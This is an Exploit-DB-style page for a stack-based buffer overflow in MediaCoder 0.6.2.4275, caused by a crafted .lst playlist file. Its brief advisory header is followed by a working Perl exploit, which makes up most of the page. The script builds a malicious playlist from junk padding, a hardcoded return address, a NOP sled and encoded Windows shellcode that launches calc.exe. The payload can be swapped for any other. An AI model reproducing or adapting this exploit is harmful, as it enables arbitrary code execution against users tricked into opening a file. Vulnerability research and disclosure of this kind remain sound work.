MediaCoder 0.6.2.4275 .lst Stack Based Overflow

vendor:

MediaCoder

by:

SKULL-HACKER

9,3

CVSS

HIGH

Stack Based Overflow

119

CWE

Product Name: MediaCoder

Affected Version From: 0.6.2.4275

Affected Version To: 0.6.2.4275

Patch Exists: YES

Related CWE: N/A

CPE: a:mediacoder:mediacoder

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

MediaCoder 0.6.2.4275 .lst Stack Based Overflow

MediaCoder 0.6.2.4275 is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the application when handling a specially crafted .lst file. This can be exploited to cause a stack-based buffer overflow by enticing a user to open a malicious .lst file. Successful exploitation could result in arbitrary code execution.

Mitigation:

Upgrade to the latest version of MediaCoder 0.6.2.4275 or later.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# MediaCoder 0.6.2.4275 .lst Stack Based Overflow > # Discovered by :[ SKULL-HACKER ]
my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D";
my $junk  = "\x41" x 254;
my $ret   = "\x93\x43\x92\x7c"; #
my $nop   = "\x90" x 25;
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $calc_shell =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
    "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
    "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
    "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
    "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
    "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
    "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
    "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
    "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
    "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
    "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
    "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
    "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";
 
print $header.$junk.$ret.$nop.$calc_shell.$nop;
 
# > ## Author :
# > SkuLL-HacKeR  
# > [Â»] Home : WwW.Sec-ArT.CoM/cc
# > <http://www.Sec-ArT.CoM/cc>  
# > [Â»] GreetZ : ~~>: hack4love - ASER ELRO7 - str0ke : ,
# > milw0rm.com  
# > [Â»] Special Thx : Of all Moroccans : Simo-soft - djekmani4ever - jadi
# > chel7 ]  
# > [Â»] Contact MSN: Wizard-skh[at]HoTmaiL[Dot]CoM /
# > SkuLL--HacKeR[at]hotmail.CoM
 
 
# > | Sec-ArT.com :) _/
 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #  

# milw0rm.com [2009-08-03]